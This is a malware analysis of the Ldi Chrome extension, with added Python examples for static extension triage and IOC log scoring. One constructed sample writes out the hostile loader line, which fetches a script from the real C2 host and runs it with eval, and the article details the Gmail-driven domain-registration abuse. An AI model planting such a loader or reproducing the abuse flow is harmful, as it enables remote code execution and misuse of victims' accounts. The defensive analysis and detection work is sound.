With Chrome being the most widely used web browser, attackers are starting to develop more advanced and malicious extensions for it every day. Whether it's impersonating popular extensions to deliver ads, hijacking search queries, or injecting the CoinHive browser miner, it is easy to see that malicious extensions are on the rise.

The extension we are going to look at today, called Ldi, takes malicious behavior to the next level: not only does it load the Coinhive browser miner into the victim's browser and consume all available CPU, it also uses the victim's Gmail account to register free domains for the attackers through Freenom.

Promoted through scammy web sites

This extension was promoted through sites that displayed JavaScript alerts continuously prompting the visitor to install the extension. When a victim tried to close these alerts, the page would automatically open the Chrome Web Store page for the extension (the promoting site is no longer online). The Chrome Web Store page had little to no information, and its description was simply "Wondering if your homepage is compatible with Mac? Check it with Ldi.". The extension has since been removed from the Chrome Web Store.

Chrome Web Store Page for LDI

When I dug down further and examined the source, though, it was obvious that this was not our garden variety unwanted extension.

Down the rabbit hole with the Ldi Extension

This extension consists of two JavaScript files called jarallax.min.js and bootstrap-filestyle.min.js as seen below.

Extension Folder

When I looked at the bootstrap-filestyle.min.js script, I noticed that the extension developer had appended a section of obfuscated JavaScript to the end of the file that executes whenever the browser starts.

Obfuscated Code

The above JavaScript includes another obfuscated script, which is decoded and executed. Once executed, the script connects to the URL http://fbcdnxy.net/fgelohmmdfimhmkbbicdngnpeoaidjkj/geo-location.json?cache=[timestamp]. This site responds with yet another script, which the extension then executes. This lets the attackers change the extension's functionality at any time simply by serving a different script.

Currently, the remote script that is sent back to be executed is http://fbcdnxy.net/coobgpohoikkiipiblmjeljniedjpjpf/remote-postal-code.json. This script is the meat of the extension and will perform the various malicious activities such as loading Coinhive and registering domains through your Gmail account.
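The pattern described above (a bundled library with code appended that fetches a remote script and executes it) is something you can triage statically before ever running the extension. The following is an added example, not code from the article or from the extension: it walks an unpacked extension directory, compares each bundled library against a known-good vendor hash, flags dynamic-execution primitives (eval, new Function, unescape, and so on) and extracts referenced URLs, treating cleartext http:// URLs as an extra signal. The sample files it writes are constructed stand-ins, not the real jarallax.min.js or bootstrap-filestyle.min.js, and the known-good hash table is hypothetical.

```python
"""Static triage of an unpacked Chrome extension (added example, not the article's code)."""
import hashlib
import os
import re
import tempfile

# Primitives that load or run code at runtime. None is malicious on its own,
# but a third-party "library" file that suddenly gains them deserves a look.
DYNAMIC_EXEC = {
    "eval": re.compile(r"\beval\s*\("),
    "new Function": re.compile(r"\bnew\s+Function\s*\("),
    "setTimeout(string)": re.compile(r"\bsetTimeout\s*\(\s*['\"]"),
    "String.fromCharCode": re.compile(r"String\.fromCharCode"),
    "unescape": re.compile(r"\bunescape\s*\("),
}
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?:/[^\s'\"<>)]*)?")


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_js_source(text):
    """Return the dynamic-execution indicators and URLs found in one JS source."""
    hits = sorted(name for name, rx in DYNAMIC_EXEC.items() if rx.search(text))
    urls = sorted(set(URL_RE.findall(text)))
    return {"dynamic_exec": hits, "urls": urls,
            "cleartext_urls": [u for u in urls if u.startswith("http://")]}


def scan_extension_dir(root, known_good=None):
    """Walk an unpacked extension and score every .js file.

    known_good maps a file name to the sha256 of the vendor's genuine build;
    a mismatch means the bundled library was modified (e.g. code appended)."""
    known_good = known_good or {}
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if not name.endswith(".js"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as f:
                info = scan_js_source(f.read())
            digest = sha256_file(path)
            expected = known_good.get(name)
            info.update({"file": name, "sha256": digest,
                         "modified_library": expected is not None and expected != digest})
            reasons = []
            if info["modified_library"]:
                reasons.append("hash differs from vendor build")
            if info["dynamic_exec"]:
                reasons.append("dynamic code execution: " + ", ".join(info["dynamic_exec"]))
            if info["cleartext_urls"]:
                reasons.append("cleartext URL(s): " + ", ".join(info["cleartext_urls"]))
            info["reasons"], info["suspicious"] = reasons, bool(reasons)
            findings.append(info)
    return findings


# Constructed sample, not the real extension: a harmless library stub, and the
# same stub with a loader appended that fetches a remote script and eval()s it.
BENIGN_LIB = "!function(e){e.jarallax=function(){return 1}}(window);\n"
APPENDED_LOADER = (
    BENIGN_LIB
    + "fetch('http://fbcdnxy.net/fgelohmmdfimhmkbbicdngnpeoaidjkj/geo-location.json?cache='+Date.now())"
    + ".then(function(r){return r.text()}).then(function(s){eval(unescape(s))});\n"
)


def build_sample_extension(root):
    """Write the constructed files into root; return a hypothetical known-good hash table."""
    with open(os.path.join(root, "jarallax.min.js"), "w") as f:
        f.write(BENIGN_LIB)
    with open(os.path.join(root, "bootstrap-filestyle.min.js"), "w") as f:
        f.write(APPENDED_LOADER)
    clean = hashlib.sha256(BENIGN_LIB.encode()).hexdigest()  # pretend both vendor builds are the clean stub
    return {"jarallax.min.js": clean, "bootstrap-filestyle.min.js": clean}


def scan_sample_extension():
    """Build the constructed sample in a temp dir, scan it, and return {file: finding}."""
    with tempfile.TemporaryDirectory() as tmp:
        allow = build_sample_extension(tmp)
        return {f["file"]: f for f in scan_extension_dir(tmp, allow)}


if __name__ == "__main__":
    for name, f in scan_sample_extension().items():
        print(f"{'SUSPICIOUS' if f['suspicious'] else 'ok':10} {name}: {'; '.join(f['reasons']) or '-'}")
```

The hash comparison is the cheapest and most reliable of the three checks: a minified library in an extension should be byte-identical to the upstream release, so any difference is worth diffing by hand, which is exactly how the appended block in bootstrap-filestyle.min.js would surface.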

Once the browser starts, the above malicious script is executed and the fun begins.

First, the extension will connect to Facebook. While I did not see it do anything other than connect, there is quite a lot of code dedicated to Facebook, which could be for spreading the extension via Facebook Messenger. Unfortunately, I did not have the time to review that part of the code as much as I would have liked.

The extension now quickly loads Coinhive so that the browser begins mining Monero for the developer.

Chrome Task Manager showing the mining

After that, it begins the process of registering domain names using your Gmail account. First it connects to Freenom.com by POSTing to the URL https://my.freenom.com/includes/domains/fn-available.php and checking whether a randomly named domain is available to register under various TLDs. In this example, it was checking what was available for the string "jihafivagobumini".

Checking for Available Domains

Once it retrieves the available domain options, it adds each of those domains to a cart using the URL https://my.freenom.com/includes/domains/fn-additional.php.

Adding domain to the cart

When done adding the domains, it starts the checkout process, but needs an email address and registrant information to register the domains under. To get the email address, it connects to the URL https://mail.google.com/mail/u/0/h/1pq68r75kdvdr/?v=lui to switch the logged-in Gmail account to Gmail's HTML view, which allows it to retrieve the email address of the logged-in user. If a user is not logged into Gmail, the extension is unable to register the domains.

It then connects to https://randomuser.me/api/0.4/?randomapi in order to generate random registration information that can be used during the checkout.

Random User for Checkout

Now that it has both an email address and random registration information, it finishes the checkout process at Freenom. To complete the registration, though, the victim has to confirm their email address. The extension handles this step too: it checks the Gmail account and automatically opens the verification link.

This results in 4 domains being generated for the extension developer, but registered with the victim's Gmail address. This is done each time the extension is installed in Chrome.

Registered Domains

Now that the domains have been registered it sends this information back to the C2 server at http://fbcdnxy.net/.

At this time it is not known what these domains are being used for, but they could easily be used to distribute malware, further spread the extension, or for phishing campaigns. Whatever they are used for, with each victim registering 4 domains for the developer, and some malicious extensions having hundreds, if not thousands, of users, this quickly adds up to a huge arsenal of domains for the attacker.

As I, and others, research this extension further I will update this article with any relevant information that is discovered.

IOCs

Network Traffic:

http://fbcdnxy.net/
http://fairexttrades.com/
https://my.freenom.com/
https://www.facebook.com/
https://coinhive.com/
https://mail.google.com/mail/
https://randomuser.me/

Hash:
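The network IOCs above are of very different quality: fbcdnxy.net and fairexttrades.com are specific to this extension, while Freenom, randomuser.me, Facebook and Gmail are legitimate services that merely get abused, so matching on them alone would flood an analyst with false positives. The following is an added example, not part of the article, showing how to weigh them: it parses constructed proxy log lines (the format and the client addresses are made up), classifies each destination as C2 or abused service, and ranks each client as "infected" on any C2 contact, "likely" when the Freenom plus randomuser.me registration flow is seen without the C2 (for example because the C2 was blocked), and "review" when only a single abused service appears.

```python
"""Score proxy-log clients against the Ldi network IOCs (added example, not the article's code)."""
import re
from collections import defaultdict
from urllib.parse import urlparse

# Domains from the IOC list above. C2 domains are specific to this extension;
# the abused services are legitimate and only count in combination.
C2_DOMAINS = {"fbcdnxy.net", "fairexttrades.com"}
ABUSED_SERVICES = {"my.freenom.com", "randomuser.me", "coinhive.com"}
# facebook.com and mail.google.com are also listed but far too common to score on.

# Constructed sample log, one request per line: "<timestamp> <client> <method> <url> <status>".
SAMPLE_LOG = """\
2018-01-09T10:00:01Z 10.0.0.5 GET http://fbcdnxy.net/fgelohmmdfimhmkbbicdngnpeoaidjkj/geo-location.json?cache=1515492001 200
2018-01-09T10:00:02Z 10.0.0.5 GET https://coinhive.com/ 200
2018-01-09T10:00:05Z 10.0.0.5 POST https://my.freenom.com/includes/domains/fn-available.php 200
2018-01-09T10:00:06Z 10.0.0.5 GET https://randomuser.me/api/0.4/?randomapi 200
2018-01-09T10:00:07Z 10.0.0.5 GET https://mail.google.com/mail/u/0/h/1pq68r75kdvdr/?v=lui 200
2018-01-09T10:01:00Z 10.0.0.7 GET https://randomuser.me/api/0.4/?randomapi 200
2018-01-09T10:01:30Z 10.0.0.7 GET https://www.google.com/ 200
2018-01-09T10:02:00Z 10.0.0.9 GET https://my.freenom.com/clientarea.php 200
2018-01-09T10:03:00Z 10.0.0.11 POST https://my.freenom.com/includes/domains/fn-available.php 200
2018-01-09T10:03:01Z 10.0.0.11 GET https://randomuser.me/api/0.4/?randomapi 200
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")


def parse_line(line):
    """Parse one log line into a dict, or return None for lines that do not fit the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, client, method, url, status = m.groups()
    return {"ts": ts, "client": client, "method": method, "url": url,
            "host": urlparse(url).hostname or "", "status": int(status)}


def host_matches(host, domain):
    """True for the domain itself and any subdomain of it."""
    return host == domain or host.endswith("." + domain)


def classify_host(host):
    """Return ("c2" | "abused", matched_domain) or (None, None)."""
    for domain in sorted(C2_DOMAINS):
        if host_matches(host, domain):
            return "c2", domain
    for domain in sorted(ABUSED_SERVICES):
        if host_matches(host, domain):
            return "abused", domain
    return None, None


def score_clients(log_text):
    """Return {client: {"c2": [...], "abused": [...], "verdict": str}} for clients with any hit."""
    clients = defaultdict(lambda: {"c2": set(), "abused": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        kind, domain = classify_host(rec["host"])
        if kind:
            clients[rec["client"]][kind].add(domain)

    result = {}
    for client, hits in clients.items():
        if hits["c2"]:
            verdict = "infected"   # any contact with the extension's C2 is decisive
        elif {"my.freenom.com", "randomuser.me"} <= hits["abused"]:
            verdict = "likely"     # the registration flow seen, C2 not observed (e.g. blocked)
        else:
            verdict = "review"     # one legitimate service; most likely ordinary use
        result[client] = {"c2": sorted(hits["c2"]), "abused": sorted(hits["abused"]),
                          "verdict": verdict}
    return result


if __name__ == "__main__":
    for client, r in sorted(score_clients(SAMPLE_LOG).items()):
        print(f"{client:12} {r['verdict']:9} c2={r['c2']} abused={r['abused']}")
```

The ordering matters for the shared-library hosts: because each victim contacts randomuser.me and Freenom within a few seconds of the C2 fetch, correlating per client (rather than alerting on each IOC hit) is what separates a compromised browser from someone who simply visited Freenom.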